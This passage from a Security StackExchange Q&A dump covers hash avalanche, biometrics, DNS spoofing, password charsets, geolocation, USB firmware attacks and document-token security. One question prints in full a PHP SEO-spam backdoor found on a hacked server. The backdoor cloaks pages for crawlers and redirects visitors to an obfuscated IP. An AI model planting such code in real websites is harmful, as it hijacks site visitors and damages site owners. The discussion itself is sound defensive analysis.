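With random nonces you should still re-key long before anything approaching 2^32 messages under one key, so that the chance of an accidental nonce collision stays negligible.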
{ "source": [ "https://security.stackexchange.com/questions/136739", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123759/" ] }
136,900
I have been reading about password management lately (very interesting stuff!) and was wondering how different the hashes would be for similar strings. Is it possible to know if a password guess was close by comparing the resulting hash to the real hash? For example, if the real password is "password123" and a hacker tries "Password123", "password1234", "password124", etc., would the generated hashes be similar enough to the real hash that either the hacker or their computer could tell they were on the right track? Let's assume that the hacker knows any salt, pepper, cayenne powder, adobo, whatever... If they try the right password they will generate a matching hash. (I think this might vary depending on the hash function used, but I don't know this for sure.)
No, you cannot determine how close your guess was by looking at the hash. A hash function is designed with this in mind: a single changed bit in the input must change a lot of bits in the output. It's called the Avalanche Effect. Below are SHA-1 hashes for some of your example passwords:
cbfdac6008f9cab4083784cbd1874f76618d2a97 - password123
b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1 - Password123
2b4bfcc447c3c8726d26c22927a68f511d5e01cc - password124
115b55dcc1cd9a0dfdd60c120e83eaf658c45fc6 - right horse battery staple
abf7aad6438836dbe526aa231abde2d0eef74d42 - correct horse battery staple
A single bit change will completely change the hashing result. In fact, in the ideal case, for every changed input bit, each output bit flips with a 50% probability.
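You can see the avalanche effect for yourself with a few lines of Python: hash two inputs whose ASCII encodings differ in exactly one bit ('p' is 0x70 and 'P' is 0x50) and count how many output bits change.

import hashlib

def sha1_hex(s: str) -> str:
    return hashlib.sha1(s.encode()).hexdigest()

def differing_bits(hex_a: str, hex_b: str) -> int:
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")

a = sha1_hex("password123")
b = sha1_hex("Password123")   # input differs from the one above by a single bit
print(a)
print(b)
print(differing_bits(a, b), "of 160 output bits differ")   # around 80 on average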
{ "source": [ "https://security.stackexchange.com/questions/136900", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122457/" ] }
136,917
So one of my laptops had a virus recently. I managed to remove it by running my computer in safe mode and then running my antivirus software (Norton). My laptop appears to be running fine now. Should I feel OK checking my bank account and doing personal business items on it now? Or should I still be worried that a virus is there? The computer is less than 2 years old. Barely used. The computer was acting funny and slower than usual, so I brought it into safe mode and my antivirus discovered the virus and removed it.
{ "source": [ "https://security.stackexchange.com/questions/136917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99332/" ] }
136,920
What I basically want to do is perform a test on my Wi-Fi and brute force it instead of using a dictionary attack. I googled, and all the results showed me examples of dictionary attacks and no brute forcing. My password is somewhat like this: aXb2@abc. I know this can take a lot of time, but since it's my home network I can let my computer do the work. Also, is there a better option than brute forcing this type of password? I am using Kali Linux 2. Thanks.
{ "source": [ "https://security.stackexchange.com/questions/136920", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124512/" ] }
136,966
I am new to this community, so please forgive me if my question is stupid. I discovered that my server got hacked, and found several PHP files on it. I haven't been lazy and tried my best to detect what the file actually was doing, but im really not understanding what the purpose of it is. One PHP file is: <?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i', '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i', '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i', '#BingBot#i' ) ; if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){ $isbot = 1; } if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) { $isbot = 1; } $adr1 = "....................................."; $adr2 = "."; $adr3 = "..................................................................................................................................................................................................................."; $adr4 = ".............................................................................................................................................................................................................."; $ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4); if ($isbot) { $myname = basename($_SERVER['SCRIPT_NAME'], ".php"); if (file_exists($myname)) { $html = file($myname); $html = implode($html, ""); echo $html; exit; } //if (!strpos($_SERVER['HTTP_USER_AGENT'], "google")) exit; while($tpl == 0) { $tpl_n = rand(1,9); $tpl = @file("tpl$tpl_n.html"); } $keyword = "1 euro terno su tutte vincita "; $keyword = chop($keyword); $relink = "<UL></UL>"; $query_pars = $keyword; $query_pars_2 = str_replace(" ", "+", chop($query_pars)); for ($page=1;$page<3;$page++) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.ask.com/web?q=$query_pars_2&qsrc=11&adt=1&o=0&l=dir&page=$page"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); $result = str_replace("\r\n", "", $result); $result = str_replace("\n", "", $result); preg_match_all 
("#web-result-description\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; } $mas1 = array("1", "2", "3", "4", "5"); $mas2 = array("11-20", "21-30", "31-40", "41-50", "51-60"); $setmktBing = "US"; $lang = "US"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://search.yahoo.com/search?p=$query_pars_2"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; // echo $result; // exit; sleep(1); foreach ($mas1 as $var=>$key) { $link = ""; preg_match_all ("#<strong>$key</strong><a href=\"(.*)\" title=\"Results $mas2[$var]\"#iU",$result,$mm); $link = str_replace('<strong>'.$key.'</strong><a href="', "", $mm[0][0]); $link = str_replace('" title="Results '.$mas2[$var].'"', "", $link); if (strlen($link)<5) continue; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$link"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; sleep(1); } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://www.google.com/search?q=$query_pars_2&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6'); $result = curl_exec($ch); curl_close($ch); $result = str_replace("\r\n", "", $result); $result = str_replace("\n", "", $result); //echo $result; preg_match_all ("#<span class=\"st\">(.*)</span>#iU",$result,$m); foreach ($m[1] as $a) $text .= $a; $text = str_replace("...", "", $text); $text = strip_tags($text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = str_replace(" ", " ", $text); $text = explode(".", $text); shuffle($text); $text = array_unique($text); $text = implode(". ", $text); $html = implode ("\n", $tpl); $html = str_replace("[BKEYWORD]", $keyword, $html); $html = str_replace("[LINKS]", $relink, $html); $html = str_replace("[SNIPPETS]", $text, $html); $out = fopen($myname, "w"); fwrite($out, $html); fclose($out); echo $html; } if(!@$isbot) { $s = dirname($_SERVER['PHP_SELF']); if ($s == '\\' | $s == '/') {$s = ('');} $s = $_SERVER['SERVER_NAME'] . $s; header("Location: http://$ard/input/?mark=20160624-$s"); //header("Location: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); exit; } ?> In my understanding, the code does the following: 1) Check if it gets executed by a bot - if so terminate 2) decrypt the hidden IP 3) create a search term in a very useless way? 4) Make three curl search requests to yahoo, google and ask.com 5) get the data from those search requests, only take certain information 6) write those information into a file? In my best understanding thats what the program is doing, but I don't get what the harm is ? Why would someone go through the hassle to find a website to sneak this on to? or am i missing anything critical in this script? Thanks for all your help!
(I haven't gone over the code, I'm speculating because your description fits the modus operandi of some malware I've seen in the past.) It's probably a bot that is trying to build a network of backlinks to a known group of web assets. Basically they find a vulnerable site and pop it. From there the script does a search to find which of the attacker's assets are currently ranking highest (or lowest) and haven't been penalized by Google et al. yet. They promote their assets further by implanting top keywords and links to those sites into an HTML document that gets served from your domain. Now when Google indexes your site, they see you are endorsing their sites and they rank even higher in the search results. It's pretty clever. It's toxic to you though because when Google penalizes spam farms, they also penalize sites that link to them. Your SEO will probably take a hit if/when judgment day comes. Remediate this ASAP.
{ "source": [ "https://security.stackexchange.com/questions/136966", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124572/" ] }
136,971
An associate of mine has asked for my help because he is being fined $1000 because a web application he uses in his line of work claims he's shared his logon credentials with someone else, violating their terms of service. He claims he's not done this. The site claims they know there are multiple humans using his password because they use keystroke dynamics during the logon process. To quote their auditor: "The main factor on your account is multiple typing patterns, which indicate multiple users." The auditor provided an audit of login events which I've reviewed. It shows 5 unique "keystroke IDs". They only track successful logons, and use of the Backspace key clears the entire password, forcing re-entry from scratch. I believe they use a browser plug-in to capture the data. What doesn't make sense is that all of the logons came from my associate's laptop from only two public IP addresses: his office and his home. Of the 5 keystroke IDs, 4 happened at work. Interestingly, 4 of the 5 patterns were also present in logons made from his home. I think these patterns are all being generated by my associate, but I'm not familiar enough with keystroke dynamics to explain how it could generate false-positive results. Is it true that multiple typing patterns indicate multiple users? If not, what could explain one person having multiple patterns?
A common theme with biometric authenticators is that they are based on bodily features or behaviors which have inherent variability. Most authentication systems do a couple of things to reduce the rejection of valid users. First, these systems allow a defined amount of variability when comparing biometric samples. In other words, they acknowledge that you won't type your password exactly the same way every time (in fact some systems look at exact matches as an indicator of a replay attack). There is usually a threshold within the system to still allow authentication if the supplied biometric sample is 'close enough'. Make the system less forgiving and you increase your False Rejection Rate (FRR), which means legitimate users aren't authenticated. In this case the FRR may actually indicate that the user was successfully authenticated but a new 'keystroke ID' was generated. Make the system more forgiving and you increase your False Acceptance Rate (FAR), which means unauthorized users are more likely to be misidentified. Sometimes this control can be adjusted by the system administrators to meet their unique deployment needs, and other times the vendor/developer hardcodes in a value that they feel works best for most users. Second, these systems need to capture a sufficient number of samples from the authorized user in order to create an accurate biometric template. This is more important for a biometric like keystroke dynamics where your typing will change from entry to entry. The more samples this template is based on the better it works with the first control that compares whether new authentications are within the margin of error of the authorized user template. What we don't know, and may not be able to find out, is how these two elements are handled by the service your friend uses. It's possible they tuned their system to reduce the FAR so much that variations in how he types during subsequent logins are generating different 'keystroke IDs', despite it really being him. This research paper on keystroke dynamics lists their FRR at around 5%. In the context of this service that might mean a similar FRR would generate a different keystroke ID for your friend's valid logins in 1 out of every 20 logins. We also don't know how many logins they used to train their system for his valid biometric template. They may have just used his initial password entry during account setup. Or they may have trained the system using a few dozen of his logins before looking for unauthorized use. Clearly the second approach is the one they should have used in order to improve the quality of their biometric template. Unless this is a new system or a shady vendor, I would assume that they'd have already fixed these problems since they would presumably affect all of their customers and cause a lot of complaints. But it's also possible that you friend just has more variation in his password entry technique than normal users. I agree with Johnny's answer that having different keystroke ID profiles is just one indicator that the vendor should use to determine if fraud is occurring. Without details on their particular biometric system it is possible that he is solely responsible for all of these logins and is mistakenly being accused of violating the ToS. He should ask them for more information beyond just the source IP and keystroke ID of the logins, or make the argument that the evidence they've supplied so far is flimsy.
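To make the trade-off concrete, here is a purely hypothetical sketch of how a threshold-based matcher could work; this is not the vendor's algorithm, just an illustration of why tightening the tolerance produces more false rejections (and, in a system like the one described, more "new" keystroke IDs for the same person):

from statistics import mean, stdev

def build_template(enrollment_samples):
    # enrollment_samples: several logins, each a list of inter-key times in ms
    per_interval = list(zip(*enrollment_samples))
    return [(mean(col), stdev(col)) for col in per_interval]

def matches(template, attempt, tolerance=2.0):
    # average number of standard deviations the attempt sits from the template
    devs = [abs(t - m) / (s or 1.0) for (m, s), t in zip(template, attempt)]
    return mean(devs) <= tolerance

enrolled = [[110, 95, 240, 130], [120, 90, 250, 125], [105, 100, 230, 140]]
template = build_template(enrolled)

print(matches(template, [115, 96, 245, 128]))   # same typist on a typical day -> True
print(matches(template, [60, 60, 60, 60]))      # very different rhythm -> False

Lowering the tolerance rejects impostors more often (lower FAR) but also starts rejecting the legitimate user's own off days (higher FRR).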
{ "source": [ "https://security.stackexchange.com/questions/136971", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46200/" ] }
137,098
Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided. Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this: Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 2.6.32-042stab116.2 x86_64) Documentation: https://help.ubuntu.com/ Last login: Sat Sep 17 04:39:57 2016 from ic.fbi.gov Immediately, I contacted my hosting company. They said that they didn't know why this might be, and that it's possible the hostname was spoofed. I did a bit more digging, and resolved ic.fbi.gov to an IP address. I then ran this on the system: last -i This returned my IP address, and then two other IP addresses which were unknown to me. I geoIP'd these two IP addresses. One of them was a VPN and the other was a server from a hosting company in the state of Washington. Again, the IP that I resolved ic.fbi.gov to was not on the list. Do you think I should be concerned/worried about the "FBI" obtaining access to my VPS? Or is it just a hacker that spoofed the hostname?
An IP address can be set up in DNS to resolve to any host name, by whoever is in control of that IP address. For example, if I am in control of the netblock 203.0.113.128/28, then I can set up 203.0.113.130 to reverse-resolve to presidential-desktop.oval-office.whitehouse.gov . I don't need control of whitehouse.gov to do this, though it can help in some situations (particularly, with any software that checks to make sure reverse and forward resolution matches ). That wouldn't mean that the president of the United States logged into your VPS. If someone has access to your system, they can change the resolver configuration which will effectively enable them to resolve any name to any IP address, or any IP address to any name. (If they have that level of access, they can wreak all kinds of other havoc with your system as well.) Unless and until you verify that the IP address that was used to log in actually is registered to the FBI, don't worry about the host name being one under fbi.gov . That name mapping may very well be faked. Worry instead that there has been a successful login to your account that you cannot explain, from an IP address that you don't recognize. Chances are that if the FBI wanted the data on your VPS, they would use a somewhat less obvious approach to get it. You should worry, but not about the fbi.gov hostname. Go read How do I deal with a compromised server? on Server Fault, and How do you explain the necessity of “nuke it from orbit” to management and users? here on Information Security. Really, do it. Do it now; don't put it off.
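If you want to check this yourself, the usual test is forward-confirmed reverse DNS: look up the PTR name for the address, then check whether that name resolves back to the same address. A minimal Python sketch (the IP below is a documentation placeholder; substitute the addresses from last -i):

import socket

def forward_confirmed_reverse_dns(ip: str) -> bool:
    try:
        claimed_name, _, _ = socket.gethostbyaddr(ip)               # PTR lookup
        _, _, forward_ips = socket.gethostbyname_ex(claimed_name)   # forward (A) lookup
    except OSError:
        return False
    print(f"{ip} claims to be {claimed_name}, which resolves to {forward_ips}")
    return ip in forward_ips

print(forward_confirmed_reverse_dns("203.0.113.130"))

Whoever controls the IP's reverse zone can name it anything they like, but they normally cannot also make the real fbi.gov zone point that name back at their address, so a mismatch is a strong hint the PTR record is decorative.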
{ "source": [ "https://security.stackexchange.com/questions/137098", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124741/" ] }
137,320
We have been told when creating passwords/keys etc. never to use a different language/character set to create them, i.e. a Mandarin keyboard, as it greatly decreases the strength. Why is this?
In general, there is no reason not to use arbitrary characters in a password, unless the system processing the password does something stupid with them (like removes them completely, leaving an empty password). In the bad old days of language-specific character sets, there was always the risk that a password with non-ASCII characters might stop working when you switched to a different computer, because it was encoding those characters differently. But nowadays everybody's pretty much standardized on Unicode as the standard universal character set, so that reason rarely applies unless dealing with old legacy systems. (Of course, we still have different ways of encoding Unicode characters into bytes, like UTF-8, UTF-16-LE/BE, UCS-32, etc., but at least those are generally pretty well under the receiving program's control, as opposed to depending on the user's OS and/or terminal settings like charset selection used to be. And, honestly, UTF-8 is becoming pretty well established as the standard Unicode encoding for I/O purposes, even if some software may use other encodings internally.) In fact, using characters from a wider pool makes it harder for an attacker to guess your password by brute force. That said, making the password slightly longer generally does that more effectively than sprinkling "weird" characters into your password ( obligatory xkcd link ), so you should only use non-English characters in your password if you can type and remember them easily, e.g. because you speak a language that uses those characters. Still, there are some reasons why you might sometimes not want to use non-ASCII characters in your password: They might not be easy to type , if you ever need to log in from a shared / borrowed computer with a different keyboard, or if your own computer's keyboard layout gets switched for some reason. (Actually, the same goes for ASCII punctuation too, since a lot of keyboard layouts like to switch those keys around. But at least you usually can type them on any keyboard.) The system processing the password might not accept them. People have funny ideas about what counts as a valid password, and especially some older systems (and especially if they were developed in the US) might simply refuse to accept anything but printable US-ASCII characters in passwords. They might even have sort-of-valid reasons for doing that, e.g. if the passwords are internally passed between old legacy systems that use different character encodings, or that break on non-ASCII data in some way (see below). Even on the client side, some of those old charset issues might still rear their head. For example, if the password is typed into an HTML form on a web page, and if the page does not explicitly specify its character encoding, different browsers might auto-detect different encodings , causing the password (and any other text entered into the form) to be encoded differently. For some writing systems, Unicode normalization could also cause problems. Without going into details, there are several equivalent ways to represent many characters in Unicode. If the password processing system does not explicitly run the password through a Unicode normalization algorithm before hashing it (and many do not), then it's possible that typing the same character on different computers might result in a different sequence of Unicode code points, causing passwords using that character not to match. 
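To make the normalization issue concrete, here is a small Python sketch; SHA-256 is used only to keep the demo short, a real system would of course use a proper password hash such as bcrypt or Argon2:

import hashlib
import unicodedata

# 'é' can arrive as one precomposed code point (NFC) or as 'e' plus a combining
# accent (NFD); both render identically but hash differently unless the server
# normalizes before hashing.
pw_nfc = unicodedata.normalize("NFC", "caf\u00e9")
pw_nfd = unicodedata.normalize("NFD", "caf\u00e9")

print(pw_nfc == pw_nfd)                                    # False
print(hashlib.sha256(pw_nfc.encode("utf-8")).hexdigest())
print(hashlib.sha256(pw_nfd.encode("utf-8")).hexdigest())  # different digest

def normalized_hash(password: str) -> str:
    # one common server-side fix: pick a single normalization form first
    normalized = unicodedata.normalize("NFC", password)
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

print(normalized_hash(pw_nfc) == normalized_hash(pw_nfd))  # True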
If the back-end that handles the passwords was never designed or tested with anything but ASCII characters, it might also simply break when given input it doesn't expect. For example: Different parts might handle non-ASCII characters differently. You might expect that all password processing in a given system would go through the same code, but in practice, there could well be multiple implementations password hashing (e.g. for different user interfaces to the same back end data), and they might not agree 100% on unexpected inputs. This could e.g. mean that your password might work over the web, but not with a native client app, or vice versa. The system might strip away non-ASCII characters , or even truncate the password at the first such character. You'd think that would be a crazy thing to do for a password (and it is!), but the system might e.g. be running all input through some generic "input sanitization" function that simply strips away anything it doesn't recognize as "safe". In most cases, that's not a terrible security measure to take (even if it would generally be safer to signal an error instead of silently discarding data); for passwords, it could be disastrous. The system might internally use non-ASCII characters as delimiters , on the assumption that those characters will never appear in real data. That might seem like a silly thing to do, but I've seen it done, including here on Stack Exchange . At best, such as design would force the system not to accept such characters in the delimited data; at worst, using such characters could cause the data to be truncated or garbled. Obviously, that could be really bad for a password. (Of course, some systems may do this with ASCII delimiters, too, leading to silly restrictions like "password may not contain @ or % ".) The system might limit the password length. A lot of old password hashing schemes (and even some relatively modern and otherwise seemingly decent ones, like bcrypt from 1999) will not accept passwords longer than some number of bytes, and may even silently truncate passwords longer than the limit. This is a potential security problem in general, but it can be exacerbated by the use of a variable-length encoding like UTF-8, where non-ASCII characters take up two or more bytes per character. Thus, for example, a system that limited passwords to 16 bytes of UTF-8 could handle a 16-character ASCII password, but only 8 characters of e.g. Greek or Cyrillic text. The upshot of all this is that, in general, using only printable US-ASCII characters in a password is least likely to trigger software bugs or limitations. Given that password handling bugs can often be difficult to deal with (since the only response you'll often get is "invalid password"), a lot of people may find it easiest and safest to stick to them. If you do want to use a non-ASCII password (e.g. to make yourself less of an easy target for brute force password cracking, or just because it's easier for you to type and remember), you may want to test that the system really handles your password in a (reasonably) sane way. I would suggest testing at least: that you can log in with your password (using all available login methods, if the system offers several, and with all browsers or other clients you're likely to use); that all features linked to your password (like, say, encrypted storage) really work correctly; and that you cannot log in with simple variants of your password, e.g. 
with some non-ASCII characters changed or with extra characters appended to the end. In any case, there's an argument to be made that, at least in 95% of all cases, you should not be choosing your own passwords anyway. Rather, you should be using a secure password manager, and letting it generate random passwords for you. Such randomly generated passwords will typically be long strings of random printable ASCII characters, to maximize entropy while minimizing potential compatibility issues, but it really doesn't matter much since you don't need to type or memorize them yourself. Of course, you do still need to choose a password for your password manager. But hopefully your password manager, at least, is well written and will handle non-ASCII passwords correctly.
{ "source": [ "https://security.stackexchange.com/questions/137320", "https://security.stackexchange.com", "https://security.stackexchange.com/users/140149/" ] }
137,418
Whenever I open the Google Maps app on my Android mobile phone, Google always seems to know my location, and it is very accurate (usually it places me on the map even in the correct room). Also, this happens even if both WiFi adapter and GPS are off. I know WiFi adapter off doesn't really mean anything, and I have heard Google uses information about nearby routers to geolocate you. But doesn't this mean ISPs are providing Google all (or some) of their routers' location? As far as I know, no private company aside from my ISP should know sensitive data like my location, name, etc ... So, how does Google locate me so precisely?
Google uses BSSID information from your WLAN Access Point to get an approximation of where you are located, even with GPS and WiFi turned off . Taken from “How does Google Maps estimate my location without GPS?” : Google and others like Apple and Skyhook build a Database which links WLAN BSSIDs to a geographic location. A BSSID is like the MAC address of a access point that gets broadcasted by that access point. It is therefore "public viewable" if the BSSID broadcast is enabled, which is the default for most access points. The BSSID operates on a lower layer as the IP stack, you don't even have to be connected to an access point to receive these broadcasts. So, essentially, when you ARE using WiFi and GPS, Google's database of BSSIDs is updated with a geographic location associated with that BSSID, as you've assumed. In your case, your AP is sending beacons advertising its BSSID, and because it is already in Google's database, Google Maps knows where you are based on the location of that AP. So it's not that the ISP is giving Google the location of their routers , it's that your phone has already helped to build a database of the Access Points around you, and Google uses this data for geolocation. Sadly, even if you get a new router and keep any and all Android devices away from it, they will still be able to approximate your location based on the cell towers your phone connects with (or maybe even your neighbor's AP!), but it won't be nearly as accurate. I saw in the comments questions about whether or not Android phones will receive location data even with WiFi turned OFF . The answer is, yes, absolutely they can. I'm sorry I didn't make that clearer. Better check your settings if you were unaware: This "feature" has been included since Android 4.3 , and prior versions of the Android OS do not include this feature . Thanks to martinstoeckli for this information. Although turning off this "feature" on your phone seems like the best way to prevent your BSSID from being added to the database, this isn't necessarily the case . You've got other people's phones, the phones of passers-by, and even Google's own Street View cars to contend with . Thanks to Bakuriu for pointing this out. Though this may be the case, you can opt out of your involvement in this program by appending _nomap to the end of your SSID . Your SSID is the "name" of the network that you have chosen or have been given . For example, you connect to the SSID "Home" or "D-Link" for your WiFi at home. In order to opt out you would rename your network Home_nomap or D-Link_nomap . Thanks for the tip Andrea Gottardo. For more, refer to the Google Support article about opting out.
{ "source": [ "https://security.stackexchange.com/questions/137418", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102582/" ] }
137,496
I read a BBC article about empty USB sticks containing malware: Berlin-based researchers Karsten Nohl and Jakob Lell said a device that appeared to be completely empty could still contain a virus. How can "empty" USB sticks contain malware? Is this only a problem for (legacy) Windows systems? Is there some way to use these sticks while protecting yourself? This question may seem similar to other questions but those have not concerned empty sticks.
You can hack the firmware of a USB device. With that you can tell the OS whatever you want, e.g. that the device is empty even if it is not. Or you can attack the USB software stack of the OS by sending data that a normal USB device would not send (so the device could even really be empty; the attack comes from the firmware). You can also do other funny stuff, like tell the OS that the USB device is also a keyboard, then automatically type commands the moment it is plugged in. Or tell the OS the USB device is a network card, and redirect all traffic to a server you control. Endless fun with hacked USB firmwares...
{ "source": [ "https://security.stackexchange.com/questions/137496", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20225/" ] }
137,641
Facebook stores old password hashes (along with the old salt), such that if you try to log in with a previous password, Facebook tells you that you updated the password (and when). Nice user experience. Except this site isn't ux.stackexchange.com . So, what security threats are presented by this? See also about Facebook storing old passwords here and here .
The other answers look pretty reasonable, but I wanted to add a few possibilities. If an attacker recovers one or more of your passwords from other breaches, it seems like plugging them into Facebook's UI could leak at least a few types of information: Whether you used the password on multiple services or not. With known disclosure dates for the breach, they could also gain a data point on how long it took you to update the password. If pattern-matching on recovered passwords suggests a likely iterator or mutation pattern in your password, it also seems like an attacker could also try one or two passwords they haven't seen in order to support or refute a thesis about how your passwords evolve over time. I would guess any attacker is somewhat limited in how many such tests they could attempt without someone noticing, but it seems like information along these lines could inform heuristics for how known users change their passwords, improve statistics on how common different update patterns are, and help hone priority lists of users/accounts that are most vulnerable. These seem like fairly small risks at the individual level, but it also seems like ( Martin Bos' post on cracking hashes in the LinkedIn breach is instructive) small heuristic improvements turn into pretty nice levers for recovering more passwords in a large scale breach while simultaneously improving the heuristic/lever.
{ "source": [ "https://security.stackexchange.com/questions/137641", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59522/" ] }
137,682
Someone is claiming to have sent me an email to my Hotmail account. I never received this email. They have forged an Outlook email showing the date and time that it was sent. How can I prove that their claim is forged?
The SMTP logs of Hotmail, their provider or any trusted third-party involved in delivering the email could confirm if their servers did or did not process it. (There is no guarantee that logs are available and likely you won't be given that information without a court order.) But either way you won't be able to prove that they forged it . That's because there are plenty of ways an e-mail can get lost . It might very well be an accident and from their point of view it's equally hard to prove that the email has actually been sent .
{ "source": [ "https://security.stackexchange.com/questions/137682", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125320/" ] }
137,796
The JP Morgan Chase homepage has a 5 second delay before login form appears. If you refresh the delay is always there. If you fail to input a proper password, the failed login page has no such delay when the page is loaded, regardless of how many refresh requests. Is the homepage implementing some sort of security measure?
Is the homepage implementing some sort of security measure? If you are referring to https://www.chase.com, then nope, it's just slow to load and do the transition thing. Terrible UX maybe, but this is not a security feature. A login cracking bot would not typically use the user interface anyway. Basically, it's a banking website, and terrible UX is sadly the norm. While this particular case may not be security related, it's not uncommon to have rate-limiting between login requests. This would have to be implemented in the back-end code and applied to all requests in order to be effective.
{ "source": [ "https://security.stackexchange.com/questions/137796", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123386/" ] }
137,845
We are building a web app where users can insert 6 letters/digits (A_Z, 0-9) into a form to access a document. Every document has a randomly assigned access code like this: 1ABH5F. When the user inserts a valid code, the document is shown. There is no user login (no authentication) - it is open to the public. The front end will access the document via a stateless API - the code will be sent to the API, which will return the document. How should we implement information security? Nobody here is a security expert, but we were thinking like this: Using a captcha on the front end Limiting calling the API from a single IP more than 3 times/hour What other things do we have to implement to prevent access to the documents? I guess it is very important to specify the use case for this system: It is a system for anybody holding this document to see the original (digital) document. It will be used in an environment where users can print the documents (for example: car dealer) and bring it to other companies (for example: car registration office). The problem here is, that users can (and DO!) falsify the printed documents, then bring them to other companies (car registration office). These other companies have to have a way to check if the original is the same as the printed version. Since we do not know which the other companies are (any of 10000+ car registration offices), any person holding/viewing the 6 letter token can access to the original document.
Brute forcing So you have an alphabet of size 36 and 6 characters. That gives you about two billion different tokens. Let's say you have a thousand different documents. That gives you a chance of one in two million of guessing a token associated with a document. Trying from a thousand different IPs every hour for a year would give you almost ten million guesses - that should give you a couple of documents. Sure, the CAPTCHA makes this harder. But CAPTCHAs are not perfect, and they can always be cracked by humans. The problem here is that since you only enter a token and no document ID you can only rate limit on IP and not on document. That makes it very hard to protect against brute forcing unless you have a very large space to pick tokens from. Sharing A password is personal and you are encouraged not to share it. That means it can be easily changed if it is compromised, and you have some control over who gets their hands on it. A document token like this is supposed to be shared by design. You have very little control over who gets it. It will end up on mail servers and backups and post-its on people's desktops all over the world. You have no idea who has access to the token, and if you need to change it you will need to redistribute it to all the persons who are supposed to have it. That is neither secure nor practical. Conclusion: There must be a better way This will not give you very good security. If the resource you are protecting is not very important it might be enough, but I would not use it for anything of value. I do not know your exact use case, but whatever it is there must be a better way to solve this problem than rolling your own API. Using an existing solution would also save you the problem of having to write your own code. Use an existing cloud storage service, a VPN connection into the company 